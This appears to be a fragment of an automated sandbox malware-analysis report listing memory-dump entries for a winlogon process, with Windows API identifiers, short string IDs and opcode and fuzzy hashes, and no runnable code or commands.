                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                  • String ID:
                                  • API String ID: 1092925422-0
                                  • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                  • Instruction ID: b94f7e42cbb31fede1bc303a79be398a8fa66e254d5e631259a74597b8976633
                                  • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                  • Instruction Fuzzy Hash: F711462674578193FF248F26E4482196770F744B81F05402BEE8D03795EB7DC594CBA4
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 2395640692-1018135373
                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                  • Instruction ID: 7cc56dc5878abcd6a96181a4b2024c97ccb0eaf9ae46be06cfffd60e81ecf245
                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                  • Instruction Fuzzy Hash: C551C6323516828BEB54CF27E44CB6C77A1F358B98F16412ADA4A4779ADB79C8C1CF10
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 2395640692-1018135373
                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                  • Instruction ID: 1f63982a18062e9f0935fceb1145b5e81ded89a10b4697858e9dea8d64b7cbc5
                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                  • Instruction Fuzzy Hash: B551EA32351A828AFB54CF17E48CB6C7792F358B98F16415BDA4A4778AD778C8C1CB20
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000003.2213692370.000002E991720000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_3_2e991720000_winlogon.jbxd
                                  Similarity
                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                  • String ID: csm$csm
                                  • API String ID: 3896166516-3733052814
                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                  • Instruction ID: 5245f6954dfabc6742d6d348b4d87dc19f51a601044c91f07984bcb02d770560
                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                  • Instruction Fuzzy Hash: F451AF322867C28AEB748F13D14876877A0F355B94F1A491BDA8947BD6DB38C4D2CF11
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: CallEncodePointerTranslator
                                  • String ID: MOC$RCC
                                  • API String ID: 3544855599-2084237596
                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                  • Instruction ID: 3bc2d67f80104992992477e7340d9035f78e25e83d3d511ca87db9c2dc8273e3
                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                  • Instruction Fuzzy Hash: D561BF36508BC585EB318F16E44439ABBA0F785B98F05422AEBD817B9ADB7CC1D0CF10
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                  • String ID: csm$csm
                                  • API String ID: 3896166516-3733052814
                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                  • Instruction ID: e685092e90978d0501a2dad0ed369dd6b5fb9e804fbfe8bf10a372145ce3a3b0
                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                  • Instruction Fuzzy Hash: BB5169322807C68BEB748B23D54836877A1F754B94F16412BDA9947BD6CB39C8D0CF61
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: CallEncodePointerTranslator
                                  • String ID: MOC$RCC
                                  • API String ID: 3544855599-2084237596
                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                  • Instruction ID: 34e65dc3e1b812b9fbea43c75af0b7d457c5e3b746a7eceb7c11c9f4cf0731f4
                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                  • Instruction Fuzzy Hash: 4C61CE32508BC581EB719F16E48439AB7A0F784B98F05421BEB9813B9ADB3CC1D0CF10
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                  • String ID: csm$csm
                                  • API String ID: 3896166516-3733052814
                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                  • Instruction ID: fedb2b7326cfa88f624bc591b2eb8ac8a397b2253b847836ce97bccaf3ecacb7
                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                  • Instruction Fuzzy Hash: B4514A322847C28BFB748F23D5883587BA1F394B94F16419BDA9947B96CB38C491CF21
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                  • String ID: pid_
                                  • API String ID: 517849248-4147670505
                                  • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                  • Instruction ID: c4a06dece46056ab7789d1c3daff1342b5858c2528e36e34403515c746dcdc1c
                                  • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                  • Instruction Fuzzy Hash: 7D1151213547C391FB109B37E80935A62A4F748784F96442BAE59C36A6EF79C985CB30
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                  • String ID: pid_
                                  • API String ID: 517849248-4147670505
                                  • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                  • Instruction ID: f59c48bcdb5ee82874b622a1c9d690f7a9c3128cb9a259ca3b6a1111052294fb
                                  • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                  • Instruction Fuzzy Hash: 2A1187113547C391FB109B3BE89935A93A4F744740F82406BAE4D83696EF68C989CB30
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                  • String ID:
                                  • API String ID: 2718003287-0
                                  • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                  • Instruction ID: 0543faa1264bf5e933782931de0b7ed961c74ad66f662df87aebe23a03844e65
                                  • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                  • Instruction Fuzzy Hash: 6CD10E32714A8189E751CFA6D4482EC3BB1F354BD8F42421BCE5DA7B9ADB34C486CB61
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                  • String ID:
                                  • API String ID: 2718003287-0
                                  • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                  • Instruction ID: bccf53d073770c37c1661c7f5c3e2d82a1482f2af4b708a313350c1b991c6b10
                                  • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                  • Instruction Fuzzy Hash: D0D10032754A8189E710CFAAD4483EC37B1F354B99F52421BCE5D97B9ADA34C48ACB50
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: Heap$Process$Free
                                  • String ID:
                                  • API String ID: 3168794593-0
                                  • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                  • Instruction ID: 1dfc726098b2fda98d48260f526c6bb5e29f6a1ffb86288764379f9376010b8c
                                  • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                  • Instruction Fuzzy Hash: F4012532651BD1DAE718DF67E8082497BA1F788FC0B0A402ADF4A93729DF38D491CB51
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: Heap$Process$Free
                                  • String ID:
                                  • API String ID: 3168794593-0
                                  • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                  • Instruction ID: 18eab9cddb7b91f531fc7089bd83bc6e872a8bce6adce5ba8f2f7c64dfbbfc01
                                  • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                  • Instruction Fuzzy Hash: E8015372690AA1DAE714DF67E80824977A1F788F81B0A402BDB4E43729DE38D095CB50
                                  APIs
                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002E9917628DF), ref: 000002E991762A12
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: ConsoleMode
                                  • String ID:
                                  • API String ID: 4145635619-0
                                  • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                  • Instruction ID: 539dea508a0051cf67cdf58a0cdba42cff0e924aa4d181097de0980c18d7c7af
                                  • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                  • Instruction Fuzzy Hash: BC91C43275069285FBA48F67D4583AD3BA0F354BC8F45410FDE4AA7A96DB34C4C5CB22
                                  APIs
                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002E9917928DF), ref: 000002E991792A12
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: ConsoleMode
                                  • String ID:
                                  • API String ID: 4145635619-0
                                  • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                  • Instruction ID: efa4c21779cdabfdb155cba61af19c1655200ca76d9d5a99903c9194edf711c9
                                  • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                  • Instruction Fuzzy Hash: 3691F4327506D289FB68EF67D4583AD2BA0F344B99F45410FDE0E63696DA34C4C9CB20
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                  • String ID:
                                  • API String ID: 2933794660-0
                                  • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                  • Instruction ID: 9e5b0eb4c216b82bd63a9301d21dfbd72028371af2b39313a8c65cb2279ec029
                                  • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                  • Instruction Fuzzy Hash: DC115E26750F458AEF00CF62E8583A833A4F7197A8F450E2AEA6D867A5DF78C194C750
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                  • String ID:
                                  • API String ID: 2933794660-0
                                  • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                  • Instruction ID: 3ce6b5edabb619c2e02180abcadb217e0bc353f0c2f73a1621b79aa341b0b663
                                  • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                  • Instruction Fuzzy Hash: 5A11A136790F418AEB00CF71E8583A933A4F318758F450E2AEE2D837A5DF38C1988750
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: FileType
                                  • String ID: \\.\pipe\
                                  • API String ID: 3081899298-91387939
                                  • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                  • Instruction ID: 733c0bc99f424a881941c56df01b6d703df8890a3328c50a6ad7bd930ffac944
                                  • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                  • Instruction Fuzzy Hash: 4671C532284BC382E7759E27D8483AA67A4F395BC4F52001FDD4A57B9ADF34C680CB20
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: FileType
                                  • String ID: \\.\pipe\
                                  • API String ID: 3081899298-91387939
                                  • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                  • Instruction ID: 59a3da0d413b928b34785c36bc61e8b583b32b9e7b9cceb6f7dadb1da7d32d4b
                                  • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                  • Instruction Fuzzy Hash: 5471B336284BC341F7749E2BD8D83AAA794F7847C5F52005BDD0A53B8ADE34C684CB60
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000003.2213692370.000002E991720000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_3_2e991720000_winlogon.jbxd
                                  Similarity
                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 3242871069-1018135373
                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                  • Instruction ID: e18fb7e9d54445409f6371f79efeb2e97b17b61baace0021c23706677771e7a7
                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                  • Instruction Fuzzy Hash: 5751B632356A828ADB54CF17E44CB6C33D1F745B98F16891EDA464778AD77AC8C2CB20
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000003.2213692370.000002E991720000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_3_2e991720000_winlogon.jbxd
                                  Similarity
                                  • API ID: CallTranslator
                                  • String ID: MOC$RCC
                                  • API String ID: 3163161869-2084237596
                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
